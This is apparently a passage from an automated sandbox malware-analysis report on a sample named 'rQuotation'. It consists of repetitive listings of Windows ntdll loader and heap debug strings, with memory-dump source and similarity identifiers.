                                                                                                                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 016FC6C4
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01738181, 017381F5
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016FC6C3
                                                                                                                                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01738170
                                                                                                                                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 017381E5
                                                                                                                                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01738177, 017381EB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                                                                                                                                                • API String ID: 0-3393094623
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 01702DF0: LdrInitializeThunk.NTDLL ref: 01702DFA
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01700BA3
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01700BB6
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01700D60
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01700D74
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1404860816-0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                                                                                                                                                • API String ID: 0-2518169356
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01727D39
                                                                                                                                                                                                                                                • SsHd, xrefs: 016DA885
                                                                                                                                                                                                                                                • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01727D56
                                                                                                                                                                                                                                                • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01727D03
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                                                                                                                                                • API String ID: 0-2905229100
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 016F8422
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016F8421
                                                                                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 016F855E
                                                                                                                                                                                                                                                • @, xrefs: 016F8591
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • HEAP: , xrefs: 017254E0, 017255A1
                                                                                                                                                                                                                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 017255AE
                                                                                                                                                                                                                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 017254ED
                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 017254D1, 01725592
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017321D9, 017322B1
                                                                                                                                                                                                                                                • .Local, xrefs: 016F28D8
                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017322B6
                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 017321DE
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RtlDeactivateActivationContext, xrefs: 01733425, 01733432, 01733451
                                                                                                                                                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01733437
                                                                                                                                                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0173342A
                                                                                                                                                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01733456
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017210AE
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01721028
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0172106B
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01720FE5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 016E2462
                                                                                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0172A992
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0172A9A2
                                                                                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 0172A998
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • HEAP: , xrefs: 016D3264
                                                                                                                                                                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016D327D
                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 016D3255
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-4253913091
Strings
• HEAP: , xrefs: 016C1596
• HEAP[%wZ]: , xrefs: 016C1712
• HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 016C1728
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
• API String ID: 0-3178619729
Strings
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: $@
• API String ID: 0-1077428164
Strings
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
Strings
• Failed to allocated memory for shimmed module list, xrefs: 0172A10F
• minkernel\ntdll\ldrinit.c, xrefs: 0172A121
• LdrpCheckModule, xrefs: 0172A117
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 0-161242083
Strings
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
• API String ID: 0-1334570610
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 017382E8
• LdrpInitializePerUserWindowsDirectory, xrefs: 017382DE
• Failed to reallocate the system dirs string !, xrefs: 017382D7
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
• API String ID: 0-1783798831
Strings
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0177C1C5
• PreferredUILanguages, xrefs: 0177C212
• @, xrefs: 0177C1F1
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
• API String ID: 0-2968386058
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                                                • API String ID: 0-1373925480
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01744899
                                                                                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 0174488F
                                                                                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01744888
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                • API String ID: 0-3154609507
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-2558761708
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 017420F3
                                                                                                                                                                                                                                                • LdrpInitializationFailure, xrefs: 017420FA
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01742104
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-2986994758
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: #%u
                                                                                                                                                                                                                                                • API String ID: 48624451-232158463
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$@
                                                                                                                                                                                                                                                • API String ID: 0-149943524
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • LdrResSearchResource Enter, xrefs: 016CAA13
                                                                                                                                                                                                                                                • LdrResSearchResource Exit, xrefs: 016CAA25
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                                                                                • API String ID: 0-4066393604
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: `$`
                                                                                                                                                                                                                                                • API String ID: 0-197956300
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • ResIdCount less than 2., xrefs: 0171EEC9
                                                                                                                                                                                                                                                • Failed to retrieve service checksum., xrefs: 0171EE56
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                                                                                                                                                • API String ID: 0-863616075
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$MUI
                                                                                                                                                                                                                                                • API String ID: 0-17815947
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • kLsE, xrefs: 016C0540
                                                                                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 016C063D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                                • API String ID: 0-2547482624
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 016CA309
                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 016CA2FB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: MUI
                                                                                                                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: P`vRbv
                                                                                                                                                                                                                                                • API String ID: 0-2392986850
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                • API String ID: 0-3887548279
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: PATH
                                                                                                                                                                                                                                                • API String ID: 0-1036084923
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aullrem
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3758378126-0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
Strings
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
Strings
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: GlobalTags
• API String ID: 0-1106856819
Strings
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: .mui
• API String ID: 0-1199573805
Strings
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: EXT-
• API String ID: 0-1948896318
Strings
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
